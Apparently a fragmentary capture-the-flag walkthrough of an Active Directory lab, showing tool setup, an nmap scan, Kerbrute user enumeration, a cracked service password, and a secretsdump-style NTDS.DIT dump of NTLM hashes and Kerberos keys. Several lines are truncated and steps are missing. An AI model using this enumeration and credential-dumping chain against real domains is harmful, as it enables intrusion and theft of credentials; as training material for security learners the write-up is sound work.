Document
Document
export IP=10.10.192.109
Setup
Impacket requires python version >=3.7.
sudo git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
sudo pip3 install -r /opt/impacket/requirements.txt
cd /opt/impacket/
sudo pip3 install .
sudo python3 setup.py install
Bloodhound Neo4j
sudo apt install bloodhound neo4j
Kerbrute: brute force discovery of users, passwords and even password spray!
https://github.com/ropnop/kerbrute/releases
EvilWinRM
https://github.com/Hackplayers/evil-winrm
Enum
nmap
root@ip-10-10-47-56:~/AttacktiveDir# nmap -sC -sV 10.10.192.109 -oN nmap.initial
1
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.loca
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2023-06-24T16:06:44
|_Not valid after: 2023-12-24T16:06:44
|_ssl-date: 2023-06-25T16:10:46+00:00; 0s from scanner time.
MAC Address: 02:52:FA:48:EB:61 (Unknown)
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows
Abusing Kerberos
kerbrute
User list: https://raw.githubusercontent.com/Sq00ky/attacktive-directory-
tools/master/userlist.txt Password list: https://raw.githubusercontent.com/Sq00ky/attacktive-
directory-tools/master/passwordlist.txt > User and pass list is this room specific
normally brute force not recommended cuz of account lockout.
root@ip-10-10-47-56:~/AttacktiveDir# ./kerbrute_linux_amd64 userenum --dc 10.10.192.109 -d s
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
2
2023/06/25 17:39:47 > Using KDC(s):
2023/06/25 17:39:47 > 10.10.192.109:88
pass: management2005
-m 18200 Kerberos 5 AS-REP etype 23
smbclient
3
root@ip-10-10-47-56:~/AttacktiveDir# smbclient -U svc-admin -L 10.10.192.109
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\svc-admin's password:
4
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d709
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a64
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cf
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab4553
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:6ccefc4d4705491321ca8a24d7fd8ee5:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:713955f08a8654fb8f70afe0e24bb50eed14e53c8b2274c0c701ad
Administrator:aes128-cts-hmac-sha1-96:e9077719bc770aff5d8bfc2d54d226ae
Administrator:des-cbc-md5:2079ce0e5df189ad
.
.
.
Administrators NTLM: 0e0363213e37b94221497260b0bcb4fc